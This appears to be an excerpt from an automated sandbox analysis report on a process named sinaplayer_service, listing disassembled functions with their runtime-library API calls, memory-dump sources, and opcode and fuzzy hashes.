                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,8285FFAB,?,?,?,0039B158,000000FF), ref: 00388079
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE ref: 00388084
                                                                                                                                                                                                    • ??1RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 0038809A
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120 ref: 003880A7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$Base@internal@base@@Base@subtle@base@@CallbackCountedSafeThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3706058453-0
                                                                                                                                                                                                    • Opcode ID: 6071b7ec2e2ee1a63fba5156755658eba713b8c697c771fb44ef86c9a1dd0cea
                                                                                                                                                                                                    • Instruction ID: f9116bc21aa8da28a82980e801718ae61ad7c9e2da1f8d4e17dda72a526e08ea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6071b7ec2e2ee1a63fba5156755658eba713b8c697c771fb44ef86c9a1dd0cea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F101A7B1904748EFC722DF58DD01B9ABBF8EB05710F10466EE82993790E7756904CB91
                                                                                                                                                                                                    Function 6C562C8B Relevance: 6.0, APIs: 4, Instructions: 39COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(6C562CF0,0000000C), ref: 6C562C9B
                                                                                                                                                                                                    • _lock.MSVCR120(0000000C,6C562CF0,0000000C), ref: 6C562CB3
                                                                                                                                                                                                      • Part of subcall function 6C55EDD7: EnterCriticalSection.KERNEL32(?,?,6C5EE497,0000000E,6C5EE4F8,0000000C,6C55EC8C), ref: 6C55EDF3
                                                                                                                                                                                                      • Part of subcall function 6C562D0C: _unlock.MSVCR120(0000000C,6C562CDF,0000000C), ref: 6C562D0E
                                                                                                                                                                                                    • _getptd.MSVCR120(6C562CF0,0000000C), ref: 6C5AF3D2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$CriticalEnterSection_lock_unlock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2319614578-0
                                                                                                                                                                                                    • Opcode ID: b41589fd7a236cf3e4d8456a964d636e316fd2fd468162484cb2e0355289f57b
                                                                                                                                                                                                    • Instruction ID: 8037156bd603426d9844125d93eee482f5d7fde4836c81c64eb48df1fb275913
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b41589fd7a236cf3e4d8456a964d636e316fd2fd468162484cb2e0355289f57b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8018132D44715EFEB149BA68D04B9D33B06F4472DF504A4ED814A7FE0CBB85D098B91
                                                                                                                                                                                                    Function 6C5BED00 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Variance.LIBCMT ref: 6C5BED20
                                                                                                                                                                                                    • _CIsqrt.MSVCR120(00000000), ref: 6C5BED25
                                                                                                                                                                                                    • _CIsqrt.MSVCR120(00000000), ref: 6C5BED36
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Mean.LIBCMT ref: 6C5BED43
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Climbing::Concurrency::details::HillHistory::IsqrtMeasured$MeanVariance
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4254205323-0
                                                                                                                                                                                                    • Opcode ID: f8f68753f45d432288076acab3bf6aab5dae9411635517ccb724395be48d2db6
                                                                                                                                                                                                    • Instruction ID: 38fb3fa83f7c849b6e1cd885509f32d74904ff462b4c89690185419352c8d963
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8f68753f45d432288076acab3bf6aab5dae9411635517ccb724395be48d2db6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F04970900519DACF00AFA4DE610EDBB78AF82311B2445D9D881B6640CBB14D6687EA
                                                                                                                                                                                                    Function 00372930 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00374DB0: ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120(?,00372082), ref: 00374DB9
                                                                                                                                                                                                      • Part of subcall function 00374DB0: ??3@YAXPAX@Z.MSVCR120(00375490,?,00372082), ref: 00374DC4
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00372964
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037296D
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00372976
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00372983
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$??3@$??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?pptr@?$basic_streambuf@U?$char_traits@_W@std@@@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1202211527-0
                                                                                                                                                                                                    • Opcode ID: dbf3baf8486819394829a17ddc197bc3064ed3b4f56206d0396ea3d2e979d1d2
                                                                                                                                                                                                    • Instruction ID: de26a17907a204f9da34213f60613425f0a7b91fcc643d9f2af82390a8052836
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbf3baf8486819394829a17ddc197bc3064ed3b4f56206d0396ea3d2e979d1d2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDF0C2B21042088FCB06DF18DDD9D85B7BCFF25308B0440AAE9098F262DB31E949CB90
                                                                                                                                                                                                    Function 003822B0 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00000008), ref: 003822BE
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 003822D3
                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCR120(?), ref: 003822E7
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 003822F7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@DecrementFreeInterlockedString
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1462092259-0
                                                                                                                                                                                                    • Opcode ID: 83b1f7b34f71c31a38e5e9f522a61fa8f19046d02bab297f6211c9c8492526fd
                                                                                                                                                                                                    • Instruction ID: 7f660b612f7a7294e26d102fe2e93908fdf8e71257c89b1c690fd41c10b788aa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83b1f7b34f71c31a38e5e9f522a61fa8f19046d02bab297f6211c9c8492526fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0F0A0B2A0132147EB72AF29EC05B17B7ECAF10B00F160869EC49D7284EB34EC44C7A0
                                                                                                                                                                                                    Function 6C55EDD7 Relevance: 6.0, APIs: 4, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,6C5EE497,0000000E,6C5EE4F8,0000000C,6C55EC8C), ref: 6C55EDF3
                                                                                                                                                                                                    • __amsg_exit.LIBCMT(00000011,?,?,6C5EE497,0000000E,6C5EE4F8,0000000C,6C55EC8C), ref: 6C5A3BBA
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6C5A3BC9
                                                                                                                                                                                                    • _errno.MSVCR120(6C564630,00000008,6C57C625,?,?,?,6C5EE497,0000000E,6C5EE4F8,0000000C,6C55EC8C), ref: 6C5A3BDC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalEnterSection__amsg_exit_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4121137658-0
                                                                                                                                                                                                    • Opcode ID: 086046ec02ad51e6e846a42ced8e36d4e596f52ff7a5a11f31bc49403077a8f5
                                                                                                                                                                                                    • Instruction ID: 3d02cf8a250104e315e3ad635271444dd58f04b17c58454418dc5f934506fb37
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 086046ec02ad51e6e846a42ced8e36d4e596f52ff7a5a11f31bc49403077a8f5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DCF08231384218E6DA5067AA9C04BDD37699F427ADF00082AD50496DA1DB69D884459B
                                                                                                                                                                                                    Function 6C564F9E Relevance: 6.0, APIs: 4, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,6C564FF8,0000000C), ref: 6C564FCD
                                                                                                                                                                                                      • Part of subcall function 6C564B96: _lock.MSVCR120(?), ref: 6C564BC1
                                                                                                                                                                                                    • _fclose_nolock.MSVCR120(?,?,?,6C564FF8,0000000C), ref: 6C564FD8
                                                                                                                                                                                                      • Part of subcall function 6C564F4C: __freebuf.LIBCMT ref: 6C564F6E
                                                                                                                                                                                                      • Part of subcall function 6C564F4C: _fileno.MSVCR120(?,?,?), ref: 6C564F74
                                                                                                                                                                                                      • Part of subcall function 6C564F4C: _close.MSVCR120(00000000,?,?,?), ref: 6C564F7A
                                                                                                                                                                                                      • Part of subcall function 6C565014: _unlock_file.MSVCR120(?,6C564FEF,?,?,6C564FF8,0000000C), ref: 6C565015
                                                                                                                                                                                                    • _errno.MSVCR120(6C564FF8,0000000C), ref: 6C5A541D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6C564FF8,0000000C), ref: 6C5A5428
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __freebuf_close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1403730806-0
                                                                                                                                                                                                    • Opcode ID: bd067d519a1f9dba788fb48ff492a64594f1855432f85aaa16b75e73712c8d1f
                                                                                                                                                                                                    • Instruction ID: 38da1e8d8a9cf016344a282c1060848f26290bfc08deefa5cb7c715ab9b4c3e0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd067d519a1f9dba788fb48ff492a64594f1855432f85aaa16b75e73712c8d1f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F09031801604EED711DBA7DC00B9EB6E06F81339F518649D824ABFE0CB7C8D069F95
                                                                                                                                                                                                    Function 6C5BCDCD Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6C5BCDD4
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000004,6C5BCB35), ref: 6C5BCDF9
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000004,6C5BCB35), ref: 6C5BCE10
                                                                                                                                                                                                    • Concurrency::details::ContextBase::~ContextBase.LIBCMT ref: 6C5BCE36
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseContextHandle$BaseBase::~Concurrency::details::H_prolog3
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 256686745-0
                                                                                                                                                                                                    • Opcode ID: 963798c4568e8b428dcdb878023fa0a84e48c2ed84dead1c4823289eb127b258
                                                                                                                                                                                                    • Instruction ID: dce7651f585663fda63f62c80bb7b80b39b5d569a2e7f6f849be18724ed3e955
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 963798c4568e8b428dcdb878023fa0a84e48c2ed84dead1c4823289eb127b258
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF04F70B01700CBDB249F76889579ABAE4AF85604F50041DA59B9BB00CB74A804CB59
                                                                                                                                                                                                    Function 6C570868 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __p__iob.MSVCR120(6C570850,00000010), ref: 6C570823
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6C57082F
                                                                                                                                                                                                      • Part of subcall function 6C57079C: __p__iob.MSVCR120(6C570842,6C570850,00000010), ref: 6C57079C
                                                                                                                                                                                                    • __p__iob.MSVCR120(6C570850,00000010), ref: 6C57086C
                                                                                                                                                                                                    • _fputwc_nolock.MSVCR120(0000000A,-00000020,6C570850,00000010), ref: 6C570877
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob$__ftbuf_fputwc_nolock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2527319753-0
                                                                                                                                                                                                    • Opcode ID: 6ff86a049333a4de97063c5c71ac72e177c6a85fe1bee56a3ed504a515b622a2
                                                                                                                                                                                                    • Instruction ID: 74dd8a06d02ae3266fc13360cea5393b57dcec538091928d143b58d2224a8eb1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ff86a049333a4de97063c5c71ac72e177c6a85fe1bee56a3ed504a515b622a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65E0D8B78A424195AE1497FA9C11AFC33E09BD426CB640106E410D5FD0DF1958C50724
                                                                                                                                                                                                    Function 00372710 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00372713
                                                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 0037271F
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037272E
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00372741
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?uncaught_exception@std@@Osfx@?$basic_ostream@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1787288787-0
                                                                                                                                                                                                    • Opcode ID: 78efb293f3b9f61d23e114cb14e0234a4c3f2dddaab46c0746c85d4fb022a350
                                                                                                                                                                                                    • Instruction ID: 52a3a06b592b8d519dac07b91ef684a704f0fc24963fd690052a44ed6753eb92
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78efb293f3b9f61d23e114cb14e0234a4c3f2dddaab46c0746c85d4fb022a350
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCF0ED38304101CFD729EF28E598D65B7FAFF89301719899AD4868B365CB36DC42CB80
                                                                                                                                                                                                    Function 0038AAB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 235COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,8285FFAB), ref: 0038AC28
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,rept,00000004,?,8285FFAB), ref: 0038AD1F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                    • String ID: rept
                                                                                                                                                                                                    • API String ID: 613200358-3594088979
                                                                                                                                                                                                    • Opcode ID: 6e0698ea7a7830b9cee241cd7bfafe35317ffb92d6a354bc704378e0a4eb6e19
                                                                                                                                                                                                    • Instruction ID: f4bb4d1abcde1505f270d6b04758598e861ef4463870addcf211b165a73ba250
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e0698ea7a7830b9cee241cd7bfafe35317ffb92d6a354bc704378e0a4eb6e19
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06919E71900719EFDF16EFA4C841BEEB7BAFF44314F1841AAE416AB280D770A945CB91
                                                                                                                                                                                                    Function 00376990 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003769A4
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(map/set<T> too long), ref: 003769B1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@Xlength_error@std@@
                                                                                                                                                                                                    • String ID: map/set<T> too long
                                                                                                                                                                                                    • API String ID: 2313657577-1285458680
                                                                                                                                                                                                    • Opcode ID: ef8a53ab18b7d50cdea164f520d0f98e9d559f4b2fce04875195144865dc83e0
                                                                                                                                                                                                    • Instruction ID: 4315a3fd85c2bc60894701de51612ac6c7d0ac23a64ad3eb04159eed8aa381f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef8a53ab18b7d50cdea164f520d0f98e9d559f4b2fce04875195144865dc83e0
